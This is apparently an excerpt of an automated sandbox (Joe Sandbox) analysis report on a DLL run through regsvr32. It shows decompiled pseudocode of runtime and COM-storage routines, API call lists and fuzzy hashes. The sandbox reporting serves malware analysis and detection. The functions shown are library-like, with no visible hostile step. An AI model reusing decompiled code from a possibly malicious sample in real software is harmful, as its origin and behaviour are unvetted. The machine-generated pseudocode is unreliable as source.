								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}

0x1001328a
0x10013293
0x10013295
0x10013298
0x10013299
0x1001329b
0x1001329e
0x100132a1
0x100134d0
0x100134d0
0x100134d0
0x00000000
0x100132b2
0x100132b2
0x100132b6
0x00000000
0x100132cc
0x100132cc
0x100132d1
0x100132d8
0x100132db
0x100132dc
0x100132de
0x100132e0
0x100132e1
0x100132e4
0x100132e7
0x100132ec
0x100132f1
0x100132f5
0x100132f8
0x100132f8
0x100132fc
0x10013300
0x00000000
0x10013312
0x10013312
0x10013316
0x00000000
0x00000000
0x00000000
0x00000000
0x10013316
0x10013327
0x10013327
0x10013327
0x10013338
0x1001333c
0x1001333f
0x1001334e
0x10013371
0x1001337d
0x00000000
0x00000000
0x00000000
0x1001337f
0x1001337f
0x10013382
0x10013384
0x10013388
0x10013388
0x1001338c
0x10013392
0x10013397
0x10013398
0x1001339b
0x1001339d
0x100133aa
0x100133ae
0x100133b1
0x100133bf
0x100133c7
0x100133ca
0x100133cd
0x100133de
0x100133e4
0x100133fb
0x10013400
0x1001340a
0x10013411
0x1001341a
0x1001341d
0x1001341f
0x10013428
0x10013434
0x1001343a
0x1001343e
0x1001344a
0x1001344d
0x10013454
0x10013459
0x1001345d
0x1001345f
0x10013462
0x10013464
0x10013467
0x1001346a
0x1001346d
0x100134b7
0x100134bc
0x100134bf
0x00000000
0x00000000
0x100134c1
0x100134cb
0x00000000
0x100134cc
0x1001346f
0x10013474
0x10013479
0x1001347a
0x10013481
0x10013484
0x1001348c
0x00000000
0x00000000
0x1001348e
0x10013491
0x10013493
0x1001349c
0x100134a1
0x100134a2
0x100134a9
0x100134ac
0x00000000
0x00000000
0x00000000
0x00000000
0x10013493
0x1001334e
0x100132d1
0x100132b6

APIs

__allrem.LIBCMT ref: 10013342
__allrem.LIBCMT ref: 1001335A
__allrem.LIBCMT ref: 10013376
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4

Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413

Strings

E, xrefs: 10013308

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
String ID: E
API String ID: 4106114094-3568589458
Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000B89E Relevance: 12.3, APIs: 8, Instructions: 303
memoryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E1000B89E(intOrPtr __ecx) {
				void* _t115;
				intOrPtr _t119;
				intOrPtr* _t120;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				void _t128;
				intOrPtr* _t130;
				long _t133;
				void* _t134;
				void* _t135;
				void* _t136;
				void _t138;
				void _t140;
				void* _t142;
				void* _t143;
				void* _t146;
				void* _t147;
				void _t148;
				void* _t150;
				intOrPtr* _t152;
				void* _t153;
				void _t157;
				void* _t158;
				void _t160;
				intOrPtr* _t162;
				void* _t167;
				intOrPtr* _t169;
				intOrPtr* _t171;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr* _t176;
				intOrPtr _t187;
				intOrPtr* _t207;
				void* _t211;
				void* _t226;
				void* _t227;
				void* _t228;

				E10011BF0(0x1003aeb1, _t228);
				_t176 = __ecx + 0x4c;
				 *((intOrPtr*)(_t228 - 0x20)) = __ecx;
				_t115 = E1000A2B0(__ecx,  *((intOrPtr*)(_t228 + 8)), 0, 3, 0x10043068, _t176,  *(_t228 + 0x14));
				 *(_t228 + 0x14) = _t115;
				if(_t115 < 0) {
					L51:
					 *[fs:0x0] =  *((intOrPtr*)(_t228 - 0xc));
					return _t115;
				}
				 *(_t228 - 0x10) = 0;
				 *(_t228 - 0x14) = 0;
				 *((intOrPtr*)(_t228 + 8)) = 0;
				E1000A4B6(__ecx, __ecx + 0x3c);
				_t119 =  *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 0xc0))();
				 *((intOrPtr*)(_t228 - 0x24)) = _t119;
				if(_t119 != 0) {
					L4:
					_t226 =  *(_t228 + 0xc);
					if(_t226 == 0) {
						__eflags =  *(_t228 + 0x10);
						if( *(_t228 + 0x10) != 0) {
							L15:
							_t120 =  *_t176;
							_t211 = _t228 - 0x14;
							_t121 =  *((intOrPtr*)( *_t120))(_t120, 0x100430e8, _t211);
							__eflags = _t121;
							if(_t121 < 0) {
								L42:
								if( *(_t228 + 0x14) >= 0) {
									L45:
									_t122 =  *((intOrPtr*)(_t228 + 8));
									if(_t122 != 0) {
										 *((intOrPtr*)( *_t122 + 8))(_t122);
									}
									if( *((intOrPtr*)(_t228 - 0x24)) != 0 &&  *(_t228 + 0x14) >= 0) {
										 *(_t228 + 0x14) = 1;
									}
									_t115 =  *(_t228 + 0x14);
									goto L51;
								}
								L43:
								_t124 =  *_t176;
								if(_t124 != 0) {
									 *((intOrPtr*)( *_t124 + 0x18))(_t124, 1);
									_t126 =  *_t176;
									 *((intOrPtr*)( *_t126 + 8))(_t126);
									 *_t176 = 0;
								}
								goto L45;
							}
							__eflags = _t226;
							if(_t226 != 0) {
								__eflags =  *(_t228 + 0x10);
								if( *(_t228 + 0x10) == 0) {
									 *(_t228 + 0x14) = 0x8000ffff;
									L36:
									_t128 =  *(_t228 - 0x14);
									L37:
									 *((intOrPtr*)( *_t128 + 8))(_t128);
									L38:
									if( *(_t228 + 0x14) < 0) {
										goto L43;
									}
									if( *((intOrPtr*)(_t228 - 0x24)) == 0) {
										_t187 =  *((intOrPtr*)(_t228 - 0x20));
										if(( *(_t187 + 0x6e) & 0x00000002) == 0) {
											_t130 =  *_t176;
											 *(_t228 + 0x14) =  *((intOrPtr*)( *_t130 + 0xc))(_t130, _t187 + 0xc4);
										}
									}
									goto L42;
								}
								_t133 =  *((intOrPtr*)( *_t226 + 0x30))();
								__eflags = _t211;
								 *(_t228 - 0x2c) = _t133;
								if(__eflags > 0) {
									L29:
									 *(_t228 + 0x14) = 0x8007000e;
									 *(_t228 + 0x10) = 0;
									L30:
									__eflags =  *(_t228 + 0x10);
									 *(_t228 - 0x1c) = 0;
									if( *(_t228 + 0x10) == 0) {
										goto L36;
									}
									_t134 = _t228 - 0x1c;
									__imp__CreateILockBytesOnHGlobal( *(_t228 + 0x10), 1, _t134);
									__eflags = _t134;
									 *(_t228 + 0x14) = _t134;
									if(_t134 < 0) {
										goto L36;
									}
									_t135 = _t228 - 0x18;
									 *(_t228 - 0x18) = 0;
									__imp__StgOpenStorageOnILockBytes( *(_t228 - 0x1c), 0, 0x12, 0, 0, _t135);
									__eflags = _t135;
									 *(_t228 + 0x14) = _t135;
									if(_t135 >= 0) {
										_t138 =  *(_t228 - 0x14);
										 *(_t228 + 0x14) =  *((intOrPtr*)( *_t138 + 0x18))(_t138,  *(_t228 - 0x18));
										_t140 =  *(_t228 - 0x18);
										 *((intOrPtr*)( *_t140 + 8))(_t140);
									}
									_t136 =  *(_t228 - 0x1c);
									L21:
									 *((intOrPtr*)( *_t136 + 8))(_t136);
									goto L36;
								}
								if(__eflags < 0) {
									L26:
									_t142 = GlobalAlloc(0, _t133);
									__eflags = _t142;
									 *(_t228 + 0x10) = _t142;
									if(_t142 == 0) {
										goto L29;
									}
									_t143 = GlobalLock(_t142);
									__eflags = _t143;
									if(_t143 == 0) {
										goto L29;
									}
									 *((intOrPtr*)( *_t226 + 0x34))(_t143,  *(_t228 - 0x2c));
									GlobalUnlock( *(_t228 + 0x10));
									goto L30;
								}
								__eflags = _t133 - 0xffffffff;
								if(_t133 >= 0xffffffff) {
									goto L29;
								}
								goto L26;
							}
							_t146 = _t228 + 0xc;
							 *(_t228 + 0xc) = 0;
							__imp__CreateILockBytesOnHGlobal(0, 1, _t146);
							__eflags = _t146;
							 *(_t228 + 0x14) = _t146;
							if(_t146 < 0) {
								goto L36;
							}
							_t147 = _t228 + 0x10;
							 *(_t228 + 0x10) = 0;
							__imp__StgCreateDocfileOnILockBytes( *(_t228 + 0xc), 0x1012, 0, _t147);
							__eflags = _t147;
							 *(_t228 + 0x14) = _t147;
							if(_t147 >= 0) {
								_t148 =  *(_t228 - 0x14);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t148 + 0x14))(_t148,  *(_t228 + 0x10));
								_t150 =  *(_t228 + 0x10);
								 *((intOrPtr*)( *_t150 + 8))(_t150);
							}
							_t136 =  *(_t228 + 0xc);
							goto L21;
						}
						L10:
						_t152 =  *_t176;
						_t214 = _t228 - 0x10;
						_t153 =  *((intOrPtr*)( *_t152))(_t152, 0x10043188, _t228 - 0x10);
						__eflags = _t153;
						if(_t153 < 0) {
							goto L15;
						} else {
							__eflags = _t226;
							if(__eflags != 0) {
								E1002A986(_t228 - 0x74, _t214, __eflags);
								 *(_t228 - 4) = 0;
								E1001D6AF(_t228 - 0x2c, _t228 - 0x74);
								_t157 =  *(_t228 - 0x10);
								_t158 =  *((intOrPtr*)( *_t157 + 0x14))(_t157, _t228 - 0x2c, _t226, 1, 0x1000, 0);
								_t46 = _t228 - 4;
								 *_t46 =  *(_t228 - 4) | 0xffffffff;
								__eflags =  *_t46;
								 *(_t228 + 0x14) = _t158;
								E1002A941(_t228 - 0x74, _t228 - 0x2c);
							} else {
								_t160 =  *(_t228 - 0x10);
								 *(_t228 + 0x14) =  *((intOrPtr*)( *_t160 + 0x20))(_t160);
							}
							_t128 =  *(_t228 - 0x10);
							goto L37;
						}
					}
					if( *(_t228 + 0x10) != 0) {
						goto L15;
					}
					_t162 =  *_t176;
					_push(_t228 + 8);
					_push(0x10043198);
					_push(_t162);
					if( *((intOrPtr*)( *_t162))() < 0) {
						goto L10;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(3);
					if( *((intOrPtr*)( *_t226 + 0x50))() == 0) {
						goto L10;
					} else {
						 *(_t228 + 0x10) = 0;
						_t167 =  *((intOrPtr*)( *_t226 + 0x50))(0, 0xffffffff, _t228 + 0x10, _t228 + 0xc);
						_t207 =  *((intOrPtr*)(_t228 + 8));
						 *(_t228 + 0x14) =  *((intOrPtr*)( *_t207 + 0x14))(_t207,  *(_t228 + 0x10), _t167);
						_t169 =  *((intOrPtr*)(_t228 + 8));
						 *((intOrPtr*)( *_t169 + 8))(_t169);
						 *((intOrPtr*)(_t228 + 8)) = 0;
						goto L38;
					}
				}
				_t171 =  *_t176;
				_t227 = __ecx + 0x6c;
				 *((intOrPtr*)( *_t171 + 0x58))(_t171, 1, _t227);
				if(( *(_t227 + 2) & 0x00000002) == 0) {
					goto L4;
				}
				_t173 =  *_t176;
				_t174 =  *((intOrPtr*)( *_t173 + 0xc))(_t173,  *((intOrPtr*)(_t228 - 0x20)) + 0xc4);
				 *(_t228 + 0x14) = _t174;
				if(_t174 < 0) {
					goto L43;
				}
				goto L4;
			}

0x1000b8a3
0x1000b8b3
0x1000b8c4
0x1000b8c7
0x1000b8ce
0x1000b8d1
0x1000bba5
0x1000bbab
0x1000bbb3
0x1000bbb3
0x1000b8dd
0x1000b8e0
0x1000b8e3
0x1000b8e6
0x1000b8ef
0x1000b8f7
0x1000b8fa
0x1000b92d
0x1000b92d
0x1000b932
0x1000b997
0x1000b99a
0x1000ba06
0x1000ba06
0x1000ba0a
0x1000ba14
0x1000ba16
0x1000ba18
0x1000bb67
0x1000bb6a
0x1000bb84
0x1000bb84
0x1000bb89
0x1000bb8e
0x1000bb8e
0x1000bb94
0x1000bb9b
0x1000bb9b
0x1000bba2
0x00000000
0x1000bba2
0x1000bb6c
0x1000bb6c
0x1000bb70
0x1000bb77
0x1000bb7a
0x1000bb7f
0x1000bb82
0x1000bb82
0x00000000
0x1000bb70
0x1000ba1e
0x1000ba20
0x1000ba80
0x1000ba83
0x1000bb32
0x1000bb39
0x1000bb39
0x1000bb3c
0x1000bb3f
0x1000bb42
0x1000bb45
0x00000000
0x00000000
0x1000bb4a
0x1000bb4c
0x1000bb53
0x1000bb55
0x1000bb64
0x1000bb64
0x1000bb53
0x00000000
0x1000bb4a
0x1000ba8d
0x1000ba90
0x1000ba92
0x1000ba95
0x1000bace
0x1000bace
0x1000bad5
0x1000bad8
0x1000bad8
0x1000badb
0x1000bade
0x00000000
0x00000000
0x1000bae0
0x1000bae9
0x1000baef
0x1000baf1
0x1000baf4
0x00000000
0x00000000
0x1000baf6
0x1000bb02
0x1000bb05
0x1000bb0b
0x1000bb0d
0x1000bb10
0x1000bb12
0x1000bb1e
0x1000bb21
0x1000bb27
0x1000bb27
0x1000bb2a
0x1000ba75
0x1000ba78
0x00000000
0x1000ba78
0x1000ba97
0x1000ba9e
0x1000baa0
0x1000baa6
0x1000baa8
0x1000baab
0x00000000
0x00000000
0x1000baae
0x1000bab4
0x1000bab6
0x00000000
0x00000000
0x1000bac0
0x1000bac6
0x00000000
0x1000bac6
0x1000ba99
0x1000ba9c
0x00000000
0x00000000
0x00000000
0x1000ba9c
0x1000ba22
0x1000ba29
0x1000ba2c
0x1000ba32
0x1000ba34
0x1000ba37
0x00000000
0x00000000
0x1000ba3d
0x1000ba4a
0x1000ba4d
0x1000ba53
0x1000ba55
0x1000ba58
0x1000ba5a
0x1000ba66
0x1000ba69
0x1000ba6f
0x1000ba6f
0x1000ba72
0x00000000
0x1000ba72
0x1000b99c
0x1000b99c
0x1000b9a0
0x1000b9aa
0x1000b9ac
0x1000b9ae
0x00000000
0x1000b9b0
0x1000b9b0
0x1000b9b2
0x1000b9ce
0x1000b9da
0x1000b9dd
0x1000b9e2
0x1000b9ec
0x1000b9ef
0x1000b9ef
0x1000b9ef
0x1000b9f6
0x1000b9f9
0x1000b9b4
0x1000b9b4
0x1000b9bd
0x1000b9bd
0x1000b9fe
0x00000000
0x1000b9fe
0x1000b9ae
0x1000b937
0x00000000
0x00000000
0x1000b93d
0x1000b944
0x1000b945
0x1000b94a
0x1000b94f
0x00000000
0x00000000
0x1000b953
0x1000b954
0x1000b955
0x1000b956
0x1000b95f
0x00000000
0x1000b961
0x1000b970
0x1000b973
0x1000b976
0x1000b983
0x1000b986
0x1000b98c
0x1000b98f
0x00000000
0x1000b98f
0x1000b95f
0x1000b8fc
0x1000b900
0x1000b907
0x1000b90e
0x00000000
0x00000000
0x1000b913
0x1000b91f
0x1000b924
0x1000b927
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 1000B8A3

Part of subcall function 1000A2B0: CoGetClassObject.OLE32(?,?,00000000,100430A8,?), ref: 1000A2D0

Part of subcall function 1002A986: __EH_prolog.LIBCMT ref: 1002A98B

Part of subcall function 1002A941: __EH_prolog.LIBCMT ref: 1002A946

CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1000BA2C
StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1000BA4D
GlobalAlloc.KERNEL32(00000000,00000000), ref: 1000BAA0
GlobalLock.KERNEL32 ref: 1000BAAE
GlobalUnlock.KERNEL32(?), ref: 1000BAC6
CreateILockBytesOnHGlobal.OLE32(?,00000001,?), ref: 1000BAE9
StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1000BB05

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: GlobalLock$Bytes$CreateH_prolog$AllocClassDocfileObjectOpenStorageUnlock
String ID:
API String ID: 645133905-0
Opcode ID: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
Instruction ID: 4fa0019427ba4cc32ee59eeb07c1e68fe65e84f71fb64a57669587eeb3e16f8a
Opcode Fuzzy Hash: 185fddf691f165cf246ba28c1c06a3726dabc5333d542278f897f997fcb1b7b0
Instruction Fuzzy Hash: 73C16A70A0064AEFDB11CF64C888DAEBBB9FF89780B204559F941EB265C771DD41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1001A487 Relevance: 12.2, APIs: 8, Instructions: 169
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0xf256d946
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
						 *(_t97 - 4) =  *(_t97 - 4) | 0xffffffff;
						_t111 = _t82;
						if(_t82 != 0) {
							L19:
							_t68 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10),  *(_t97 - 0x40), _t82, _t94);
							__eflags = _t68;
							if(_t68 == 0) {
								L31:
								__eflags =  *(_t97 - 0x44);
								if(__eflags != 0) {
									_push(_t82);
									E100107C8(_t82, 0, _t94, __eflags);
								}
								_t57 =  *(_t97 - 0x34);
								goto L34;
							}
							__eflags =  *(_t97 + 0x18);
							if( *(_t97 + 0x18) == 0) {
								__eflags =  *(_t97 - 0x3c);
								if(__eflags != 0) {
									L25:
									_push(_t94);
									_push(1);
									_t69 = E1001382A(_t82, 0, _t94, __eflags);
									 *(_t97 - 0x34) = _t69;
									__eflags = _t69;
									if(_t69 != 0) {
										_t70 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, _t69, _t94, 0, 0);
										__eflags = _t70;
										if(__eflags != 0) {
											__eflags =  *(_t97 - 0x40) - 0xffffffff;
											if( *(_t97 - 0x40) != 0xffffffff) {
												 *( *(_t97 + 0x14)) = _t70;
											}
										} else {
											_push( *(_t97 - 0x34));
											E100107C8(_t82, 0, _t94, __eflags);
											 *(_t97 - 0x34) = 0;
										}
									}
									goto L31;
								}
								_t94 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94, 0, 0, 0, 0);
								__eflags = _t94;
								if(__eflags == 0) {
									goto L31;
								}
								goto L25;
							}
							_t73 = WideCharToMultiByte( *(_t97 + 0xc), 0, _t82, _t94,  *(_t97 + 0x18),  *(_t97 + 0x1c), 0, 0);
							__eflags = _t73;
							if(_t73 != 0) {
								 *(_t97 - 0x34) =  *(_t97 + 0x18);
							}
							goto L31;
						} else {
							_push(_t94);
							_push(2);
							_t82 = E1001382A(_t82, 0, _t94, _t111);
							if(_t82 != 0) {
								 *(_t97 - 0x44) = 1;
								goto L19;
							}
							goto L17;
						}
					} else {
						_t94 = MultiByteToWideChar( *(_t97 + 8), 1,  *(_t97 + 0x10), _t81, 0, 0);
						 *(_t97 - 0x38) = _t94;
						if(_t94 == 0) {
							L17:
							_t57 = 0;
							L34:
							return E1001254F(E100117AE(_t57,  *((intOrPtr*)(_t97 - 0x1c))));
						}
						goto L14;
					}
				}
			}

0x1001a487
0x1001a487
0x1001a489
0x1001a48e
0x1001a493
0x1001a498
0x1001a49d
0x1001a4a0
0x1001a4a6
0x1001a4a8
0x1001a4ab
0x1001a4ae
0x1001a4b4
0x1001a62d
0x00000000
0x1001a4ba
0x1001a4ba
0x1001a4c9
0x1001a4e4
0x1001a4e4
0x1001a4ee
0x1001a50a
0x1001a4f0
0x1001a4f3
0x1001a4fc
0x1001a501
0x1001a504
0x1001a504
0x1001a4f5
0x1001a4f5
0x1001a4f5
0x1001a505
0x1001a505
0x1001a510
0x1001a52c
0x1001a52c
0x1001a538
0x1001a53d
0x1001a540
0x1001a542
0x1001a54b
0x1001a553
0x1001a570
0x1001a572
0x1001a592
0x1001a59f
0x1001a5a5
0x1001a5a7
0x1001a630
0x1001a630
0x1001a633
0x1001a635
0x1001a636
0x1001a63b
0x1001a63c
0x00000000
0x1001a63c
0x1001a5ad
0x1001a5b0
0x1001a5d2
0x1001a5d5
0x1001a5ed
0x1001a5ed
0x1001a5ee
0x1001a5f0
0x1001a5f7
0x1001a5fa
0x1001a5fc
0x1001a608
0x1001a60e
0x1001a610
0x1001a620
0x1001a624
0x1001a629
0x1001a629
0x1001a612
0x1001a612
0x1001a615
0x1001a61b
0x1001a61b
0x1001a610
0x00000000
0x1001a5fc
0x1001a5e7
0x1001a5e9
0x1001a5eb
0x00000000
0x00000000
0x00000000
0x1001a5eb
0x1001a5c0
0x1001a5c6
0x1001a5c8
0x1001a5cd
0x1001a5cd
0x00000000
0x1001a574
0x1001a574
0x1001a575
0x1001a57e
0x1001a582
0x1001a58b
0x00000000
0x1001a58b
0x00000000
0x1001a582
0x1001a512
0x1001a523
0x1001a525
0x1001a52a
0x1001a584
0x1001a584
0x1001a63f
0x1001a64f
0x1001a64f
0x00000000
0x1001a52a
0x1001a510

APIs

GetCPInfo.KERNEL32(00000000,?,10042F10,00000038,100185C0,?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020), ref: 1001A4C5
GetCPInfo.KERNEL32(00000000,00000001), ref: 1001A4D8
_strlen.LIBCMT ref: 1001A4FC
MultiByteToWideChar.KERNEL32(00000000,00000001,10012C1E,?,00000000,00000000), ref: 1001A51D

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Info$ByteCharMultiWide_strlen
String ID:
API String ID: 1335377746-0
Opcode ID: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
Instruction ID: 70101fa7554b3a37292e61141452f95f373fba0d19c42cfe0f4ebf6b77a3f96e
Opcode Fuzzy Hash: a1739f8af5073df943149c03816b326863122fdfa87c5946c56ad2dc74c300ca
Instruction Fuzzy Hash: 99514671900619ABDF21CFA5DC84D9EBBF9FF867A0B24411AF814AA190D7309DC1CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1001666B Relevance: 12.1, APIs: 8, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E1001666B() {
				int _v4;
				int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t7;
				CHAR* _t8;
				WCHAR* _t16;
				int _t19;
				char* _t23;
				int _t24;
				long _t28;
				int _t29;
				void* _t34;
				WCHAR* _t36;
				CHAR* _t37;
				intOrPtr _t38;
				int _t40;

				_t7 =  *0x1004f700; // 0x1
				_t29 = 0;
				_t36 = 0;
				_t38 = 2;
				if(_t7 != 0) {
					L6:
					__eflags = _t7 - 1;
					if(__eflags != 0) {
						__eflags = _t7 - _t38;
						if(_t7 == _t38) {
							L21:
							_t8 = GetEnvironmentStrings();
							_t37 = _t8;
							__eflags = _t37 - _t29;
							if(_t37 == _t29) {
								L20:
								return 0;
							}
							__eflags =  *_t37 - _t29;
							if( *_t37 == _t29) {
								L25:
								_t39 = _t8 - _t37 + 1;
								_t34 = E100107B6(_t8 - _t37 + 1);
								__eflags = _t34 - _t29;
								if(_t34 != _t29) {
									E10011440(_t34, _t37, _t39);
								} else {
									_t34 = 0;
								}
								FreeEnvironmentStringsA(_t37);
								return _t34;
							} else {
								goto L23;
							}
							do {
								do {
									L23:
									_t8 =  &(_t8[1]);
									__eflags =  *_t8 - _t29;
								} while ( *_t8 != _t29);
								_t8 =  &(_t8[1]);
								__eflags =  *_t8 - _t29;
							} while ( *_t8 != _t29);
							goto L25;
						}
						__eflags = _t7 - _t29;
						if(_t7 == _t29) {
							goto L21;
						}
						goto L20;
					}
					L7:
					if(_t36 != _t29) {
						L9:
						_t16 = _t36;
						if( *_t36 == _t29) {
							L12:
							_t19 = (_t16 - _t36 >> 1) + 1;
							_v4 = _t19;
							_t40 = WideCharToMultiByte(_t29, _t29, _t36, _t19, _t29, _t29, _t29, _t29);
							if(_t40 != _t29) {
								_t23 = E100107B6(_t40);
								_v8 = _t23;
								if(_t23 != _t29) {
									_t24 = WideCharToMultiByte(_t29, _t29, _t36, _v4, _t23, _t40, _t29, _t29);
									_t52 = _t24;
									if(_t24 == 0) {
										_push(_v8);
										E100107C8(_t29, WideCharToMultiByte, _t36, _t52);
										_v8 = _t29;
									}
									_t29 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t36);
							return _t29;
						} else {
							goto L10;
						}
						do {
							do {
								L10:
								_t16 = _t16 + _t38;
							} while ( *_t16 != _t29);
							_t16 = _t16 + _t38;
						} while ( *_t16 != _t29);
						goto L12;
					}
